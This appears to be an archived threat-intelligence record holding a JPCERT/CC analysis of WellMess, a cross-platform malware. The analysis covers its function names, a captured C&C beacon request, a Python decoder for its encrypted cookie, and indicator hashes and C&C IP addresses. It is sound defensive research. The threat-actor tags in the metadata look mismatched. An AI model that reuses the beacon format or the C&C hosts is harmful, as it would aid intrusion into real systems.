{
	"id": "aaafede3-2aa8-40ba-87bb-f8262ea21955",
	"created_at": "2026-04-06T00:10:08.338531Z",
	"updated_at": "2026-04-10T13:11:43.364651Z",
	"deleted_at": null,
	"sha1_hash": "2b29b0d7ac9baf17b5cfab0c9e6e16c1592969dc",
	"title": "Malware “WellMess” Targeting Linux and Windows - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 505297,
	"plain_text": "Malware “WellMess” Targeting Linux and Windows - JPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2018-07-05 · Archived: 2026-04-05 18:16:46 UTC\r\nTool\r\nSome malware is designed to run on multiple platforms, and most commonly it is written in Java. For example, the Adwind malware (introduced in a past article) is written in Java and runs on Windows as well as other operating systems. Golang is another programming language used for such malware; it is used for the Mirai controller, which infects Linux systems.\r\nThis article introduces the behaviour of the WellMess malware based on our observation. It is written in Golang and cross-compiled so that it runs on both Linux and Windows. For more details about the malware's functions, please also refer to the report from LAC [1].\r\nBehaviour of WellMess\r\nGenerally, Golang executable files include many of their required libraries in the binary itself. This usually increases the file size, making WellMess larger than 3 MB. Another feature is that the function names of the executable can be found in the file itself. 
(Even for stripped files, function names can be retrieved by using tools such as GoUtils2.0 [2].)\r\nBelow are the function names used in WellMess:\r\n_/home/ubuntu/GoProject/src/bot/botlib.EncryptText\r\n_/home/ubuntu/GoProject/src/bot/botlib.encrypt\r\n_/home/ubuntu/GoProject/src/bot/botlib.Command\r\n_/home/ubuntu/GoProject/src/bot/botlib.reply\r\n_/home/ubuntu/GoProject/src/bot/botlib.Service\r\n_/home/ubuntu/GoProject/src/bot/botlib.saveFile\r\n_/home/ubuntu/GoProject/src/bot/botlib.UDFile\r\n_/home/ubuntu/GoProject/src/bot/botlib.Download\r\n_/home/ubuntu/GoProject/src/bot/botlib.Send\r\n_/home/ubuntu/GoProject/src/bot/botlib.Work\r\n_/home/ubuntu/GoProject/src/bot/botlib.chunksM\r\n_/home/ubuntu/GoProject/src/bot/botlib.Join\r\n_/home/ubuntu/GoProject/src/bot/botlib.wellMess\r\n_/home/ubuntu/GoProject/src/bot/botlib.RandStringBytes\r\n_/home/ubuntu/GoProject/src/bot/botlib.GetRandomBytes\r\n_/home/ubuntu/GoProject/src/bot/botlib.Key\r\n_/home/ubuntu/GoProject/src/bot/botlib.GenerateSymmKey\r\n_/home/ubuntu/GoProject/src/bot/botlib.CalculateMD5Hash\r\n_/home/ubuntu/GoProject/src/bot/botlib.Parse\r\n_/home/ubuntu/GoProject/src/bot/botlib.Pack\r\nhttps://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html\r\nPage 1 of 
7\r\n_/home/ubuntu/GoProject/src/bot/botlib.Unpack\r\n_/home/ubuntu/GoProject/src/bot/botlib.UnpackB\r\n_/home/ubuntu/GoProject/src/bot/botlib.FromNormalToBase64\r\n_/home/ubuntu/GoProject/src/bot/botlib.RandInt\r\n_/home/ubuntu/GoProject/src/bot/botlib.Base64ToNormal\r\n_/home/ubuntu/GoProject/src/bot/botlib.KeySizeError.Error\r\n_/home/ubuntu/GoProject/src/bot/botlib.New\r\n_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).BlockSize\r\n_/home/ubuntu/GoProject/src/bot/botlib.convertFromString\r\n_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).Encrypt\r\n_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).Decrypt\r\n_/home/ubuntu/GoProject/src/bot/botlib.Split\r\n_/home/ubuntu/GoProject/src/bot/botlib.Cipher\r\n_/home/ubuntu/GoProject/src/bot/botlib.Decipher\r\n_/home/ubuntu/GoProject/src/bot/botlib.Pad\r\n_/home/ubuntu/GoProject/src/bot/botlib.AES_Encrypt\r\n_/home/ubuntu/GoProject/src/bot/botlib.AES_Decrypt\r\n_/home/ubuntu/GoProject/src/bot/botlib.generateRandomString\r\n_/home/ubuntu/GoProject/src/bot/botlib.deleteFile\r\n_/home/ubuntu/GoProject/src/bot/botlib.Post\r\n_/home/ubuntu/GoProject/src/bot/botlib.SendMessage\r\n_/home/ubuntu/GoProject/src/bot/botlib.ReceiveMessage\r\n_/home/ubuntu/GoProject/src/bot/botlib.Send.func1\r\n_/home/ubuntu/GoProject/src/bot/botlib.init\r\n_/home/ubuntu/GoProject/src/bot/botlib.(*KeySizeError).Error\r\nAs mentioned earlier, WellMess has a version that runs on Windows (PE) and another on Linux (ELF). Although there are some minor differences, they both have the same functionality.\r\nThe malware communicates with a C\u0026C server using HTTP requests and performs functions based on the received commands. 
Below is an example of the communication (the User-Agent value varies per sample):\r\nPOST / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html, */*\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: c22UekXD=J41lrM+S01+KX29R+As21Sur+%3asRnW+3Eo+nIHjv+o6A7qGw+XQr%3aq+PJ9jaI+KQ7G.+FT2wr+wzQ3vd+3IJXC+lays\r\nHost: 45.123.190.168\r\nContent-Length: 426\r\nExpect: 100-continue\r\nAccept-Encoding: deflate\r\nConnection: Keep-Alive\r\n\r\npgY4C8 8JHqk RjrCa R9MS 3vc4Uk KKaRxH R8vg Tfj B3P,C 0RG9lFw DqF405. i3RU1 0lW 2BqdSn K3L Y7hEc. tzto yKU8 p1,E\r\nThe results of command execution are sent in the HTTP POST request body, which is RSA-encrypted. The data in the Cookie header is RC6-encrypted. Below is an example of the decrypted data. It contains an identifier for the infected host (the value between the \u003c;head;\u003e tags).\r\n\u003c;head;\u003e6F3C9B16C16074079AFCFF09C6717B0F07864FFE09C1E1DB003B3627D174913B/p\u003c;head;\u003e\u003c;title;\u003ea:1_0\u003c;title;\u003e\u003c;serv\r\nBelow is part of the code that decodes the data in the Cookie header. (The script is available on GitHub.)\r\nimport base64\r\nimport urllib\r\n\r\n# generateKey() and rc6() are defined in the rest of the script\r\ndef decode(data, key):\r\n    sep = ';'\r\n    field = data.split(sep)\r\n    i = 1\r\n    encdata = \"\"\r\n    # Concatenate the value part of each ';'-separated field, starting at field[1]\r\n    while i \u003c len(field):\r\n        value = field[i].split(\"=\")\r\n        encdata += value[1]\r\n        i += 1\r\n    # Undo the URL encoding and the character substitutions applied by the malware\r\n    encdata = urllib.unquote(encdata)\r\n    encdata = encdata.replace(\"+\", \" \").replace(\" \", \"=\").replace(\". \", \"\").replace(\" \", \"\").replace(\",\", \"+\")\r\n    maindata = base64.b64decode(encdata)\r\n    s = generateKey(base64.b64decode(key))\r\n    i = 0\r\n    decode = \"\"\r\n    # Decrypt the data with RC6, one 16-byte block at a time\r\n    while i \u003c len(maindata):\r\n        orgi = rc6(maindata[i:i + 16], s)\r\n        decode += orgi\r\n        i += 16\r\n    print(\"Decrypted String: %s\" % decode)\r\n
The malware may perform the following functions when receiving commands from a C\u0026C server:\r\nExecute arbitrary shell commands\r\nUpload/download files\r\nIn addition, the PE version of the malware executes PowerShell scripts.\r\nWellMess Developed in .Net Framework\r\nThere is also a version that was developed in .Net Framework. Figure 1 shows the code that generates the data contained in the Cookie header when communicating with a C\u0026C server. It contains the same string as the Cookie data in the Golang version.\r\nFigure 1: Code to generate data contained in the Cookie\r\nWe do not know why the actors have prepared two different versions; however, it seems that they choose a sample depending on the attack target.\r\nIn closing\r\nWe have confirmed some cases where WellMess infections were found in Japanese organisations. Attacks using this malware may continue.\r\nWe have listed some hash values of the samples in Appendix A. Some of the C\u0026C servers that we have confirmed are also listed in Appendix B. 
Please make sure that none of your devices are accessing such hosts.\r\n- Shusei Tomonaga\r\n(Translated by Yukako Uchida)\r\nReference\r\n[1] LAC: Cyber Emergency Center Report Vol.3 (Japanese)\r\nhttps://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf\r\n[2] GoUtils2.0\r\nhttps://gitlab.com/zaytsevgu/GoUtils2.0/\r\nAppendix A: SHA-256 Hash values\r\n0b8e6a11adaa3df120ec15846bb966d674724b6b92eae34d63b665e0698e0193 (Golang\u0026ELF)\r\nbec1981e422c1e01c14511d384a33c9bcc66456c1274bbbac073da825a3f537d (Golang\u0026PE)\r\n2285a264ffab59ab5a1eb4e2b9bcab9baf26750b6c551ee3094af56a4442ac41 (.Net\u0026PE)\r\nAppendix B: C\u0026C servers\r\n45.123.190.168\r\n103.13.240.46\r\n101.201.53.27\r\n185.217.92.171\r\n93.113.45.101\r\n191.101.180.78\r\n朝長 秀誠 (Shusei Tomonaga)\r\nSince December 2012, he has been engaged in malware analysis and forensics investigation, and is especially involved in analyzing incidents of targeted attacks. Prior to joining JPCERT/CC, he was engaged in security monitoring and analysis operations at a foreign-affiliated IT vendor. He has presented at CODE BLUE, BsidesLV, BlackHat USA Arsenal, Botconf, PacSec and FIRST Conference. JSAC organizer.\r\nSource: https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html"
	],
	"report_names": [
		"malware-wellmes-9b78.html"
	],
	"threat_actors": [
		{
			"id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805",
			"created_at": "2023-07-20T02:00:08.724751Z",
			"updated_at": "2026-04-10T02:00:03.341845Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "MISPGALAXY:APT-C-60",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854",
			"created_at": "2024-12-28T02:01:54.668462Z",
			"updated_at": "2026-04-10T02:00:04.564201Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "ETDA:APT-C-60",
			"tools": [
				"SpyGlace"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434208,
	"ts_updated_at": 1775826703,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2b29b0d7ac9baf17b5cfab0c9e6e16c1592969dc.pdf",
		"text": "https://archive.orkl.eu/2b29b0d7ac9baf17b5cfab0c9e6e16c1592969dc.txt",
		"img": "https://archive.orkl.eu/2b29b0d7ac9baf17b5cfab0c9e6e16c1592969dc.jpg"
	}
}